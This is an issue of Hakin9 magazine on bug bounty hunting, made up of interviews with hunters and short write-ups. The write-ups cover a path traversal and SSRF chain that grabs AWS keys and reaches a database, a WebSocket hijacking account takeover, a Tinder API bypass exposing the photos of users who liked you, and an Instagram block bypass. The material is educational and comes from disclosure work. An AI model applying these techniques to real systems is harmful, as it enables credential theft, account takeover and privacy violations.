Become A Bounty Hunter
Become A Bounty Hunter
Editor-in-Chief
Joanna Kretowicz
[email protected]
Editors:
Marta Sienicka
[email protected]
Dominika Zdrodowska
[email protected]
Marta Strzelec
[email protected]
Bartek Adach
[email protected]
Proofreader:
Lee McKenzie
Senior Consultant/Publisher:
Paweł Marciniak
CEO:
Joanna Kretowicz
[email protected]
Marketing Director:
Joanna Kretowicz
[email protected]
DTP
Marta Sienicka
[email protected]
Cover Design
Hiep Nguyen Duc
Joanna Kretowicz
Publisher
Hakin9 Media Sp. z o.o.
02-676 Warszawa
ul. Bielawska 6/19
Phone: 1 917 338 3631
www.hakin9.org
Bug bounty programs are rapidly becoming popular, and with that come enormous opportunities for
hackers or security specialists to earn rewards by using their skills to make the internet safer.
“How to get started in Bug Bounties?” is a common question nowadays, and we keep on getting messages
about it every day. To meet expectations we decided to prepare a whole edition dedicated to the Bug
Bounty Hunting topic. It is said that anyone with computer skills and a high degree of curiosity can become
a successful finder of vulnerabilities. You can be young or old when you start. We hope that this edition will
The magazine contains 12 interviews with people that went through the process of becoming a Bug Bounty
Hunter and were willing to share their experience. While reading their stories you will learn about the best
and most efficient tools for finding exploits, what resources are available for beginners, whether it’s worth it
to become part of the community to seek support. There is plenty of other information inside, and we
But that’s not all! Inside you will also find writeups on bug bounty findings. This more hands-on approach
We would like to thank all participants for joining in this project. We appreciate it a lot! If you like this
publication you can share it and tell your friends about it! Every comment means a lot to us. Thank you!
[Hakin9 Magazine]: Hello German! Thanks for taking an interview with us – we’re
honored! How have you been doing? Can you tell us something about yourself?
[German Namestnikov]: Hello! My name is German Namestnikov. I have practiced security for the last six
years, including almost three years of Red Teaming – my true passion! :) I hold a Bachelor’s Degree in
Applied Mathematics and some major certs like OSCP and OSCE.
[GN]: Well, first of all, bug hunting is not my primary occupation. But I still like to find bugs in applications I
I started to practice something like bug hunting in 2014 as a part of my study of web application security.
Things like bug bounty programs were not so popular in Russia (and especially in my location at the time)
and you would find them only for a very small amount of companies.
It was a very nice time when I was trying to improve the security of some local projects in the city I lived,
without any financial interest, only for the experience and probably for the mark in my CV or
recommendation letter.
GERMAN NAMESTNIKOV
Just testing some applications, sending the report and waiting – and sometimes they respond with
Bug bounty programs make bug hunting much easier. You always know the borders and have a formal
Now I don’t “hack” everything in reach as I was doing before, and just participate in Bug Bounty
[GN]: OWASP Top 10 and OWASP Testing Guide are the best possible resources. If you are going to
make real money with bug hunting, you must study web application development as well. Every piece of
By the way, Bug Bounty is not only about web-application security. Nowadays, you can meet different
companies like Intel suggesting you hack low-level software (or micro-code) or even hardware. I have no
experience with such bug bounty programs, I am not sure even I could participate there without Ph.D. in
such fields. :D
GERMAN NAMESTNIKOV
Anyway, try to be on the bleeding edge of technology. Attend hacking conferences, research new
publications in areas you are interested in – and I am sure you will find something applicable in bug
hunting.
[H9]: Do you participate in any CTFs? If so, can you tell us which ones and your
[GN]: Well, usually I don’t play CTFs, but sometimes I participate in some CTFs for fun. I can’t say if it is
useful for Bug Hunting or not, but – and this is a fact – there you can legally practice some potentially
[H9]: What about bug bounty communities? Do you think it’s important to join
them?
[GN]: It may be important if you are going to make bug hunting your primary occupation. Communities
are very important to share knowledge and new ideas, I think, sometimes you could meet there some
"private" stuff.
On the other hand, bug hunting is a very competitive field, so be patient with the people who are not
going to share anything, but keep contributing to the wide IT security community yourself – we all are
[H9]: What does the process usually look like, working with a company you report
Do you form a relationship with the companies you report bugs to?
[GN]: In the beginning, it was my goal to have long-term contracts or something like that. In this case,
you can completely research the target application to enumerate all possible security flaws and help
Usually, this work takes a lot of time. From my own experience, I can say it may be very hard to combine
such activities and a full-time job. That is why, nowadays, I am working with bug bounty programs where
you are allowed to submit particular bugs – in fact, most Bug Bounty programs work in such a manner, so
it is not a problem.
And of course, I try to form a relationship during my bug hunting activities. Seeing a lot of people
working together on their common goal and feeling like a part of these people is amazing! Sometimes I
The Community version is a good thing too, but it is nice to have the finest toys on the market. You
could use other tools as well, for example, the Kali Linux (or Parrot – to keep it unbiased) toolset will
[H9]: Let's say, as a complete beginner, I want to become a bug bounty hunter. What
[GN]: If you are starting now, you are the really lucky guy. :)
Take the OWASP Testing Guide, check the HackerOne, select the program and start digging into any
application you like. If you are a complete newbie in web-applications, you could enable the Burp or Zap
proxy, and surf the web as you usually do to see what happens when you click the links or submit the
forms. It may be very painful to start, so just try to keep having fun and learning new things. Dig
[H9]: Can you share a story of your best bounty with us? One that made you proud?
Or was memorable?
It was a usual day when I was spending time searching for a new job position using one site quite
popular in my location. The proxy was enabled and some basic checks were running in the background –
GERMAN NAMESTNIKOV
a usual thing for me at this time. It became a surprise for me that the application owners detected my
activities. It wasn't so hard for them to find my email and phone number because I conducted all my
Instead of writing angry letters, they offered me the opportunity to conduct a full-featured penetration
test, based on contract, against their web application. The next month, I was working on this project,
implementing all applicable checks from OWASP Testing Guide and something I found on the Internet.
As a result, some critical vulnerabilities were discovered and, as a result, I gained maximal privileges in
the target application, enough for accessing and manipulating all data being processed.
The report was so impressive that the customer decided to increase the payment by 150% of the initial
I am telling you about this case because it revealed something new about myself and the IT-security
world: The way from basic knowledge to advanced techniques in one month is more than a reality if you
have such a goal. Some people are especially interested in securing their apps – and it is very inspiring to
Nowadays, I have a lot of finished projects in different areas including web-application security, but this
case is the most memorable. I am still proud of this work, in some sense, it changed my life.
GERMAN NAMESTNIKOV
[H9]: Do you have any thoughts or experiences you would like to share with our
[GN]: Yeah, I have one important piece of advice – adjust the Burp Suite Intruder threads settings to
keep the target application alive during your tests :D Try to find your own way in bug hunting. You could
find some vulnerability type you like to exploit and try to exploit it everywhere, or you could just spend
some spare time digging into interesting applications – why not? The approach strongly depends on
your goal.
CHAIN OF Avinash Jain
HACKS
LEADING TO
DATABASE
COMPROMISE!
17
CHAIN OF HACKS LEADING TO DATABASE
COMPROMISE!
This is yet another security vulnerability writeup about one of my recent findings of a chain of security
vulnerabilities that linked up to compromise one of the databases of India’s most profitable E-commerce
companies. Let’s see the complete story.
(This was done with the explicit permission of the concerned company.)
This was supposed to be a targeted attack where I was specifically focussing on finding an LFI vulnerability (local
file inclusion) so I was more keen on searching and exploring functionalities and endpoints that were related to
some interaction with files and then I came across a usual functionality where an application provides you with the
options of “Android Google play” and “iPhone App store” to download their app.
This is yet another security vulnerability writeup about one of my recent findings of a chain of security
vulnerabilities that linked up to compromise one of the databases of India’s most profitable E-commerce
companies. Let’s see the complete story.
(This was done with the explicit permission of the concerned company.)
This was supposed to be a targeted attack where I was specifically focussing on finding an LFI vulnerability (local
file inclusion) so I was more keen on searching and exploring functionalities and endpoints that were related to
some interaction with files and then I came across a usual functionality where an application provides you with the
options of “Android Google play” and “iPhone App store” to download their app.
When I clicked on it, it redirected me to the following page with the following URL:
CHAIN OF HACKS LEADING TO DATABASE
COMPROMISE!
and then immediately redirected to the previously referred page and when I opened it in an incognito window to
see what’s the response when there is no referred page, it got redirected to “404 Page not found” so it was clear that
it was looking for some condition and parameters and then following the simple if/else logic. To see if there were
any missing parameters, I stumbled upon the HTML code of the page.
The logic, as expected, was very clear and the interesting thing I noticed (as you can see in the red box), there was a
php file “download_handler.php” missing in the URL that requires a parameter “path” as finaldownloadlink and
“name” for the name of the URL and that’s the reason why nothing got downloaded. Let’s follow the above code, so
the final URL came out to be:
downloadcallback/download_handler.php?path=
where I simply tried directory traversal attack (../../../../etc/passwd) and just my luck, the files had the maximum
permission given (a common mistake :/) and I was able to read /etc/passwd content and various other juicy files:
CHAIN OF HACKS LEADING TO DATABASE
COMPROMISE!
/etc/passwd file
download_handler.php
The php file was simply taking the file as an input and reading it back to the client. Could easily see it vulnerable to
SSRF as well:
SSRF
I tried reading the /etc/password using different URL schemas (file:/// , dict:// , ftp:// and gopher://) and was
able to do the same using file:/// scheme:
CHAIN OF HACKS LEADING TO DATABASE
COMPROMISE!
ElasticBeanstalk in use
This message was sufficient for me to decide to go ahead and search for AWS Instance MetaData and User Data via
SSRF:
I quickly made the call via SSRF and I was able to grab their AWS Access key, ID, token and earlier I got their
account id too, and that was the moment when the vulnerability became more critical—
CHAIN OF HACKS LEADING TO DATABASE
COMPROMISE!
Though it did not contain all the user details, it was much more than 10K. I reported the vulnerability soon after
this and they were very quick to patch it and also rotated all of their affected credentials and keys. So, having
started from LFI, I reached to SSRF from where I came to know that the application was deployed over Elastic
Beanstalk and from there I was able to grab one of the AWS account’s credentials, which helped me to reach one of
their Databases credentials that were lying in one S3 bucket over which I had complete read/write access and
connecting to the database, I found thousands of customer’s details lying along with various other sensitive
credentials/keys and information. That’s it about this interesting finding!
Avinash Jain
I am a cybersecurity researcher working in an Indian E-commerce
company Grofers as a DevSecops Engineer. I love to break
vulnerabilities that I find on my bug bounty journeys. Various articles and interviews have
been published in various Security magazines, newspapers and newsletters like Forbes,
[Hakin9 Magazine]: Hello Wai Yan Aung! Thanks for taking an interview with us –
we’re honored! How have you been doing? Can you tell us something about
yourself?
[Wai Yan Aung]: It is a pleasure to be interviewed by Hakin9. I’m doing fine, thanks. My name is Wai Yan
Aung, a 21-year-old security analyst/part-time bug bounty hunter from Myanmar. I’m a final year student
at Dagon University and have been participating in bug bounty programs as an active researcher since
2017. I currently work as a mobile and web penetration tester remotely and individually, finding and
penetration tester, making the internet a safer place. And as a reward I was acknowledged or paid with a
bounty. I have been recognized and worked with +60 well known companies and organizations in the
[WYA]: At the age of 13, I got interested in hacking and learned SQLi, XSS, CSRF, etc., without a mentor,
completely self-taught. One day in 2012, I accidentally found an XSS on a RedHat subdomain (search)
and Open Redirect on PayPal’s main domain while browsing the web in an internet cafe. But I had no
idea how to deal with them. So I missed out and later found out they can be reported to security teams
WAI YAN AUNG
responsibly, which are called Bug Bounty Programs, learn and earn. It pushes me a lot to be a bug
bounty hunter.
[WYA]: There are a variety of resources where you can start from the beginning. Here are the
recommended books you should read before starting a career in this field - The Web Application
Hacker's Handbook, The Hacker Playbook: Practical Guide To Penetration Testing, Web Hacking 101 by
Peter Yaworski, XSS Attacks: Cross Site Scripting Exploits and Defense. Here are the labs you can
practice on your localhost - OWASP WebGoat, DVWA (Damn Vulnerable Web App), OWASP BWA and
bWAPP. Here are the online labs - Google XSS Challenges, Acunetix’s Playground and VulnHub. I also
would like to recommend reading bug bounty write-ups on Medium and HackerOne’s Hacktivity page
everyday where you can follow a submission form or how a vulnerability was discovered.
[H9]: Do you participate in any CTFs? If so, can you tell us which ones and your
[WYA]: Not yet. I have not participated in CTFs in the past since I’m always busy with bug bounty
programs and private clients I report bugs to in order to deliver submissions in the meantime. But I plan
[H9]: What about bug bounty communities? Do you think it’s important to join
them?
[WYA]: Yes, it is important to join them; not only for beginners but also for professionals. To break a
modern security system, it is required to find a modern bypass. Nowadays, the technologies are
changing rapidly, which you can’t follow alone to break them. So you’ll need to join bug bounty
communities, ask and share with each other, stay up to date; this will make you more productive in bug
bounty hunting.
[H9]: What does the process usually look like, working with a company you report
Do you form a relationship with the companies you report bugs to?
[WYA]: Most of the companies I have worked with are public responsible disclosure/bug bounty
programs as singular cooperation. But I’ve also worked with private clients based on contracts. The
process of working with a private company is as usual as a public bug bounty program. But I find
vulnerabilities most carefully and send vulnerability reports to the team leader in the meantime when a
new feature was released in beta. I usually form a relationship with both because we are working
remotely and so excellent communication is the key. You can also be invited to a private program run by
[WYA]: Burp Suite and aircrack-ng are the tools I love most.
[H9]: Let's say, as a complete beginner, I want to become a bug bounty hunter. What
[WYA]: As for a complete beginner with basic hacking knowledge, I will recommend to take C|EH course
from EC-Council. I want to remind you to make sure that you have a strong self-study mindset and a
good instructor who will teach you C|EH. I don’t recommend taking C|EH course without having a
self-study mindset. The course will deliver a variety of domains and you will have to learn each, because
bug bounty hunting is not a standalone subject; it consists of APIs, web, network, mobile and
cryptography. If you are all set and ready, read bug bounty write-ups, follow the researchers, pick
kudos-only programs from the platforms and start hunting for bugs. They are more likely vulnerable than
paid programs and will teach you real world experience and knowledge, which will be useful in hunting
[H9]: Can you share a story of your best bounty with us? One that made you proud?
Or was memorable?
WAI YAN AUNG
[WYA]: Sure, I found an XSS bug in a private bug bounty program that allows users to download their
uploaded video information in an HTML file (.zip archive) containing comments of the attacker. The site
itself, comment section, is not vulnerable to XSS attack. XSS occurs when a user downloaded and viewed
HTML file in zip archive file. So I was allowed to trigger XSS on the victim's computer remotely. This bug
allowed an attacker to capture screenshots of the victim's computer, capture the HTML source code and
send it to the attacker's server, it could even perform a port scan on the internal network. Then I
submitted a submission along with working PoCs and was paid $3,000 bounty. What a nice attack
[H9]: Do you have any thoughts or experiences you would like to share with our
[WYA]: Bug bounty programs are not just for making money, you can gain knowledge and experience
through the programs. They are rare. I don’t know who you are but you may be the king of duplicates,
the king of N/As, but don’t give up. As Morihei Ueshiba said, “Failure is the key to success; each mistake
teaches us something,” but you’ll need to find a real; impactful; exploitable bug.
ACCOUNT Sharan Panegav
TAKEOVER
USING CROSS-
SITE
WEBSOCKET
HIJACKING
32
ACCOUNT TAKEOVER USING CROSS-SITE
WEBSOCKET HIJACKING
While hunting on a private program, I found the application using a WebSocket connection so I checked the
WebSocket URL and found it was vulnerable to CSWH (Cross-site websocket-hijacking). For more details about
CSWH, you can go to the below blog:
https://www.christian-schneider.net/CrossSiteWebSocketHijacking.html
So let’s assume an application is establishing a connection with websocket on URL wss://website.com. To verify
the URL is vulnerable to CSWH, I follow the below steps:
After this, visit http://websocket.org/echo.html in a new tab, enter the WebSocket URL and click ‘Connect’.
Once the connection is established, you must be able to send frames to the server from this page. Capture the
websocket frames using Burp proxy from a valid session and send them to see how the server responds. If the
server responds in the same way as it did for the valid session then it most likely is vulnerable to Cross-Site
WebSocket Hijacking.
ACCOUNT TAKEOVER USING CROSS-SITE
WEBSOCKET HIJACKING
By following the above steps, I determined the application is vulnerable to Cross-site-websocket-Hijacking. Once I
established the WebSocket connection on the new tab, I received the below websocket response:
If you observe the above response, there is a parameter “forgotPasswordId” and its value is “null”. Now I need to
determine the value of “_forgotPasswordId” to complete the attack. I decided to check the forgot password page
and submitted the password reset request.
Once again, I checked the Websocket connection and this time observed the below response and it contains a
forgotPassword token:
ACCOUNT TAKEOVER USING CROSS-SITE
WEBSOCKET HIJACKING
Exploit:
Now to prepare the exploit of an account takeover, I need to chain CSWH and the password reset request. So I
prepared the below payload to send a WebSocket response to the attacker site using XHR.
Steps:
• Host the above CSWH.html and send the URL to the victim (similar to CSRF attacks).
Once the victim clicks on the URL, you will get a websocket response on your listener as shown in the below image:
Once we have the forgot password token, we can reset the victim’s password.
Sharan Panegav
InfoSec Enthusiast, Bug Hunter, Dota 2 Addict
JOAS
ANTONIO
[Hakin9 Magazine]: Hello Joas! Thanks for taking an interview with us – we’re
honored! How have you been doing? Can you tell us something about yourself?
Member and Research, Infosec Competence Leader in Security Awareness, Cyber Security Mentor and IT
lover.
[JA]: It all started at least four years ago, when I found a vulnerability in an e-commerce site and didn't
know how to report this flaw, so I decided to research more about the topic and found the Open Bug
Bounty platform, where I did my first report. So with that I had a satisfactory result and a small reward
[JA]: First is to like security and see Bug Bounty as a way to test your skills. Second is to study
fundamentals, as you will need to think outside the box to solve complex problems, so studying the
technologies behind each concept is essential. For example, for SQL Injection attacks to have greater
depth requires that you know of SQL databases even for better exploitation; so it will be with other
vulnerabilities such as XSS that for better exploitation you will need strong knowledge in JavaScript and
Third is to practice CTF to develop logical reasoning, in addition to setting up laboratories for you to test
other methods and even play bypassing applications. I personally set up labs myself and try to develop
Fourth tip I have is that you study through practical cases and write-ups that you find on Medium or
YouTube, because it was through them that I managed to acquire some bounties.
[H9]: Do you participate in any CTFs? If so, can you tell us which ones and your
I particularly like HTB (Hack the box), even though the focus of this CTF is on compromising machines,
but the WEB challenges they have available already help the player to think outside the box and improve
Another CTF that I like is Hackaflag Brasileiro, as it has many logical challenges and puzzles that players
In addition to other CTFs out there, such as OWASP, Google, Facebook, Trendmicro, PWN2, etc.,every
[H9]: What about bug bounty communities? Do you think it’s important to join
them?
[JA]: Of course! Many communities help with practical cases and passing new means of exploration, I
recommend you look for a community that contributes a lot. However, there is little care, either when
[H9]: What does the process usually look like, working with a company you report
Do you form a relationship with the companies you report bugs to?
[JA]: I like it a lot! HackerOne, Bugcrowd and Open Bug Bounty, which are the ones I'm usually reporting,
are very attentive to the reports of their researchers and try to help in communicating with the researcher
and the company to understand the bug and thus reward the researcher.
In addition, with the ISO 29147 Standard, it becomes more serious when reporting a bug at that
company.
Generally, the relationship with companies is very neutral, rarely does a company call me to understand
the report more, only a CISO who called me, as he had two CVE registered in a product of his company
[JA]: My favorite tool is the Burp Suite! It is a complete and great tool to perform audits on web
applications, so I recommend that the newest researchers learn to use this tool.
JOAS ANTONIO
[H9]: Let's say, as a complete beginner, I want to become a bug bounty hunter. What
[JA]: First of all, I recommend that he enter programs like HackerOne and Bugcrowd, which are private
programs. Second, look for programs in the area that he has knowledge of, whether in Web, Mobile or
Third, it is organizing and planning, as it requires effort, time and patience, as it is a puzzle.
If you have difficulties, research case studies of other researchers, look for other means of exploration or
Now if you don't have enough knowledge yet to start exploring, I recommend that you look for courses,
read books, see Hakin9 articles, watch videos on YouTube and walk through security forums.
[H9]: Can you share a story of your best bounty with us? One that made you proud?
Or was memorable?
[JA]: One of them was on an American government website, unfortunately, I cannot disclose the name
due to disclosure policies, but it made me very happy and motivated me to continue in reward programs.
It earned me $ 1,000 USD, but not only was it rewarding and yes the bypass I did on their Web
Application Firewall, but because it took me almost a week and with persistence I got a Reflected XSS.
JOAS ANTONIO
[H9]: Do you have any thoughts or experiences you would like to share with our
[JA]: Persistence is everything! Do not be discouraged, as I have been discouraged several times, as I
found my knowledge very limited, but with brute force you can break all your limitations.
So study, absorb all the knowledge you encounter in your walk, focus on learning the basics, because you
do not build a house without its foundation, otherwise it falls. So my recommendation is that you have
patience and start from the bottom and gradually evolve, remember that nothing is impossible and that
LinkedIn: https://www.linkedin.com/in/joas-antonio-dos-santos/
HACKING Sanskar Jethi
INTO
TINDER’S
PREMIUM
43
HACKING INTO TINDER’S PREMIUM
MODEL
In this article, I’ll be talking about how we can bypass Tinder’s premium service and convert likes into matches
through a vulnerability in their API.
I reported this bug to Tinder’s bug bounty team and they gave me the following response:
“We are aware of this behavior and we choose to not take any action for the same”.
Tinder has a system of Likes and Matches. When a person swipes right to you, you get a like and when you swipe
right back to him/her, it’s a match. But unless you are a premium subscriber, you can’t see the liker’s profile/photo.
All you get is a blurred photo and the option to buy the premium service.
HACKING INTO TINDER’S PREMIUM
MODEL
So, when I was reverse-engineering their API, I happened to find that Tinder blurs the image on the client-side and
sends a complete image as a response.
https://api.gotinder.com/v2/fast-match/preview
So, the API requires a few request headers that can be obtained through an easy process.
Login to your Tinder account in a browser, open the developer console and search for the following request.
The only dynamic parameter is the X-Auth-Token, which needs to be updated after every week or when the call
fails.
On further investigation, I found out that Tinder’s LIKE system follows a Queue or FIFO system, where to get the
image of every person who likes you on Tinder, you have to match to the one present at the front of the queue, i.e.
the response image that was received.
Now you search through your recommendations and just swipe right :)
Tinder’s recommendation system follows a circular queue system, i.e. a recommendation rejected by you is likely to
show up again as your recommendation until a new image is added in the queue, which happens once in 24 hours
or when you change your physical location.
HACKING INTO TINDER’S PREMIUM
MODEL
Also, Tinder applies a profile boost when you travel to a different state/country and basically fetches you double the
number of likes that you are likely to get.
Now, this endpoint fetches you the image and user id of your recent suggestion.
https://api.gotinder.com/user/recs
“status”: 200,
“results”: [{
“distance_mi”: 2,
“common_like_count”: 0,
“common_friend_count”: 0,
“common_likes”: [],
“common_friends”: [],
“_id”: “518d666a2a00df0e490000b9”,
“bio”: “”,
“birth_date”: “1986–05–17T00:00:00.000Z”,
“gender”: 1,
“name”: “Elen”,
“ping_time”: “2014–04–08T11:59:18.494Z”,
“photos”: [{
“id”: “fea4f480–7ce0–4143-a310-a03c2b2cdbc6”,
“main”: true,
“crop”: “source”,
HACKING INTO TINDER’S PREMIUM
MODEL
“fileName”: “fea4f480–7ce0–4143-a310-a03c2b2cdbc6.jpg”,
“extension”: “jpg”,
“processedFiles”: [{
“width”: 640,
“height”: 640,
“url”: “http://images.gotinder.com/
518d666a2a00df0e490000b9/640x640_fea4f480-7ce0-4143-a310-a03c2b2cdbc6.jpg"
And using some OpenCV magic (to check whether the photos match) and some more requests, you can automate
your searching process and make your life much simpler.
All you have to do is make GET requests using the same request headers as above.
https://api.gotinder.com/like/{id}
https://api.gotinder.com/pass/{id}
If the above is too complex for you, you can just swipe your way through.
I don’t have the time to code a program for this, but if someone wants to create one, I’ll be happy to collaborate.
Happy Matching!
HACKING INTO TINDER’S PREMIUM
MODEL
Sanskar Jethi
I’m an Electrical Engineering sophomore at Delhi Technological University. A web and
iOS developer and an open source enthusiast. I’m also a Google code in mentor and
Google Summer of Code’18 Intern at FOSSASIA. Apart from programming you can find
https://github.com/stealthanthrax
DAVID
KOSOROK
[Hakin9 Magazine]: Hello David! Thanks for taking an interview with us – we’re
honored! How have you been doing? Can you tell us something about yourself?
Align, I pioneered the expansion of the code security programs for SAP
companies.
(2017). I’ve also been a volunteer Beta editor for PenTestMag for a number of years, and recently joined
EC Council’s Global Advisory Board for CASE (Certified Application Security Engineer). When not
reading great SciFi/Fantasy novels, I enjoy volunteering in my community, hiking, camping and generally
LinkedIn: www.linkedin.com/in/kosorok
DAVID KOSOROK
[DK]: I’ve always had a strong desire to protect others, starting with my family. It just so happens that my
family extends to those with whom I work and my customers – so it’s a big family. There are so many
predators in cyberspace that want something from someone else, and lack the morals to work for it
honestly. By helping to find security vulnerabilities in applications that my family uses, I can significantly
[DK]: I’ve had several university-aged kids ask me what to do to prepare for a cybersecurity major. The
two things I recommend to start with are math and programming basics. Java and calculus are good core
subjects to begin with. The next phase after getting the "logical thinking" portion is to start
experimenting with a common security training game called Capture the Flag, or CTF. There are several
sample sites that allow you to practice and learn. One that my team is exploring is hacker101.com
where you actually learn how to be a security tester for free. Once you reach a specific skill level, you will
be invited to join the hackerone.com bug bounty security research team and get paid for the security
vulnerabilities you find. Another site I have used to teach individuals new to the idea of security
researching is picoCTF.com. Also, begin reading the RSS feeds that are available, such as Dark Reading,
Krebs on Security, Security Magazine, Schneier on Security, The Hacker News, and Troy Hunt to name a
DAVID KOSOROK
few. PenTestMag.com is a site that I ghost edit for that has amazing articles but is not cheap, thus
potentially tough for students to purchase without a significant discount. I believe two of the most
significant industry certifications are from EC Council: Certified Ethical Hacker (CEH), and Certified
Application Security Engineer (CASE). ISC2 also has great certs, such as Certified Information Systems
Security Professional (CISSP) or the less well known Certified Secure Software Lifecycle Professional
(CSSLP). SANS.org also has several (much more expensive) certs that I think can really help, such as
GWAPT, GMOB and GPEN. I know it's a lot to absorb, and there is a growing trend to hire great
POTENTIAL security engineers that have great base technical knowledge about the systems, such as
programming or networking, that have a great attitude but not much security experience. Those certs
will help, playing CTF games shows the attitude I believe. I hope this at least gave you a few ideas.
[H9]: Do you participate in any CTFs? If so, can you tell us which ones and your
[DK]: We created a team of new AppSec engineers and participated in the 2019 picoCTF games. We had
fun, but that’s just a warm up. Our biggest goal is to invite our developers to participate with us and
[H9]: What about bug bounty communities? Do you think it’s important to join
them?
[DK]: Anything that you can do to learn new things in a legal and ethical way is a good thing. Whenever
bug bounty communities offer to teach newcomers the importance of ethical behavior as a security
researcher, then that is a community worth joining. Finding a community that has patience for the newbie
is very important, since most of us are really newbies anyway and need to learn something new every day.
Bugcrowd.com, Hackerone.com, Cobalt.io are excellent programs that I’ve used professionally that each
have a strong community to train and grow their security researching team. I also like the free Open Bug
Bounty, but it has limitations that I hope they can figure out how to improve upon, such as not being able
[H9]: What does the process usually look like, working with a company you report
Do you form a relationship with the companies you report bugs to?
[DK]: I’m much less of a hunter and much more of a manager of the bug bounty programs for the
corporations I work for. I’ve managed large programs using bugcrowd.com, hackerone.com and
cobalt.io. The engineers that work with me all participate at some level as a hunter, but we use it as a
[DK]: Burp Suite Pro is a must for all of my team. Google is on the list, as is Maltego for information
gathering. Metasploit is also a major part of the tool belt. Tools come and go, are improved and are
abandoned over time, but the most important thing is to experiment, try, learn, and strengthen your
desire to do good with the knowledge you’re gaining. Don’t get me wrong, you need these tools, but
learning how to hunt is more important than what you hunt with.
[H9]: Let's say, as a complete beginner, I want to become a bug bounty hunter. What
[DK]: I think my long-winded answer to your previous question on resources covered that topic pretty
well. When I’m looking for new team members, one of the most important things I look for is the attitude
of curiosity. It’s not taught at the university, but a student or newbie can grow that curiosity by playing
with the tools, and participating in CTF games, of which there are many free ones of excellent quality. If
I’m interviewing someone that just played with CTF because they were wondering what would happen, I
am more likely to take them over the 10 year development veteran that for some reason never
[H9]: Can you share a story of your best bounty with us? One that made you proud?
Or was memorable?
[DK]: I manage the program and the engineers more than the actual hunting, so although I’ve found a
few issues over time, it’s not something I spend a lot of time on, and is definitely something I could
improve upon.
[H9]: Do you have any thoughts or experiences you would like to share with our
[DK]: My focus as a leader has been to implement a bug bounty program that works for the corporation
in which I am serving. I will typically implement a private managed program for money, which is where
security researchers get paid, but they have to be invited to the private program and the framework that
provides the researchers also provides a level of filtering and validation. The hiring corporation provides
the scope, rules of engagement and a bucket of money to pay the validated bounties. Once the initial
program is operational, a second program is added to the first, which is the public managed program.
This is where the program is made public and anyone can join that promises to adhere to the scope and
rules of engagement. When they find something, they get points on a leaderboard, no money is
exchanged. This has huge advantages for corporations – they can allow their internal engineers to do
bug hunting, and even invite prospective customers that may want to test the security of the applications
DAVID KOSOROK
of the corporation. The combination of the two private and public managed programs allows for the best
of the best to receive their financial rewards, and for the public to test the waters as well.
BLOCKED USER Divyanshu Shukla
CAN SEND
NOTIFICATION
DUE TO
LOGICAL BUG
IN INSTAGRAM
58
BLOCKED USER CAN SEND NOTIFICATION DUE TO
LOGICAL BUG IN INSTAGRAM
The block feature allows any user to block any other user whom they don’t
want to interact with or view their profile. There is a separate mute button
when a user doesn’t want to block another user but doesn’t want to view their
posts/story/message.
Here while testing I was able to find a way a user who has blocked another
user can still receive the notification that can lead to privacy violation.
Vuln Type:
• Privacy / Authorization
Product:
• Android
• Version: 108.0.23.19
Impact:
Suppose user A was harassing user B, so user B blocked the harasser. But earlier they used to know each other so
they had all the chats in the message. But when a harasser wants, he can make sure that user B receives a
notification on Instagram, which may disturb the user B who has blocked user A (harasser).
In a separate scenario, even after blocking a harasser (user A), user B can see the changes in the profile picture
without any tool/special script and further can download the pictures.
Intended Behaviors:
The block feature is meant to completely block any user with no visibility in photos, comments or even
notifications. Neither the blocked user nor the blocking user should be allowed to view the changes in profile
picture or even be allowed to receive notifications from each other.
BLOCKED USER CAN SEND NOTIFICATION DUE TO
LOGICAL BUG IN INSTAGRAM
Proof of Concept:
1. User A and User B are chatting over the messagner and they have collected a pretty good amount of
chats over time.
User A — Attacker
User B — Victim
3. User B (Victim) deleted the chat in messages after blocking the attacker (User A).
4. The attacker cannot message the victim once blocked and according to logic there shouldn’t be any kind
of notification from the attacker to the victim and vice versa.
BLOCKED USER CAN SEND NOTIFICATION DUE TO
LOGICAL BUG IN INSTAGRAM
5. User A (harasser/attacker) starts liking the messages and photos sent in the chat
Attacker starts liking the messages from the past and the victim gets notification even if the attacker is blocked.
Left(Victim) | Right (Attacker)
6. User B receives notification from the attacker but upon opening, the notification screen is blank.
7. In another test scenario, User B changes his/her profile picture and user A (harasser) can see the
changes in the picture even when he/she is blocked.
8. For this case though, the attacker can view messages and follow the options. It won’t affect the user. This
scenario never worked but is part of the POC.
On replaying the view user request and replacing it with the victim’s public user id, the attacker can see the page
with follow and message request although even if the attacker tries to send a follow request but the victim won’t get
a notification for that.
BLOCKED USER CAN SEND NOTIFICATION DUE TO
LOGICAL BUG IN INSTAGRAM
Result:
Duplicate
Thanks!
BLOCKED USER CAN SEND NOTIFICATION DUE TO
LOGICAL BUG IN INSTAGRAM
Divyanshu Shukla
Certified cyber security professional with experience in
Information security, Security analytics and DevSecops. I
threat hunting via logs using Snypr and ELK along with
[Hakin9 Magazine]: Hello Gaurang! Thanks for taking an interview with us – we’re
honored! How have you been doing? Can you tell us something about yourself?
Website/Blog: https://gaurangbhatnagar.com/
Twitter: https://twitter.com/0xgaurang
Linkedin: https://www.linkedin.com/in/iamgaurangbhatnagar
[GB]: I started my bug bounty journey in 2015, when I was in the final year of my cyber security master’s
programme. During the course, I studied web application security and major vulnerabilities impacting
GAURANG BHATNAGAR
web applications. Whatever vulnerability I studied, I used to execute them practically on various test
beds to get a better insight of how it actually works. Leveraging my skills ahead, I soon found a stored
XSS flaw in one of the leading Healthcare websites. I contacted the CEO regarding this and told them
how they can patch this issue. The CEO was kind enough to reward me $500 for this bug. He further
thanked me for raising the awareness and he said it was my report that is prompting them to launch an
This motivated me and made me realize that not only are you helping patch the vulnerabilities but this
could be a good source of income. And my journey towards bug bounty started.
vulnerabilities.
Also, I would suggest you go through Hacker101 (https://www.hacker101.com) and Bugcrowd University
[H9]: What about bug bounty communities? Do you think it’s important to join
them?
[GB]: Bug Bounty communities are very supportive. They encourage the people who are starting in bug
bounties and often give tips and tricks to be more successful. The tips and advice they often share are
very valuable and have become fruitful to me when testing several targets. I would highly advise getting
[H9]: What does the process usually look like, working with a company you report
Do you form a relationship with the companies you report bugs to?
[GB]: I usually prefer to look for bugs in companies having responsible disclosure policy. Hackerone and
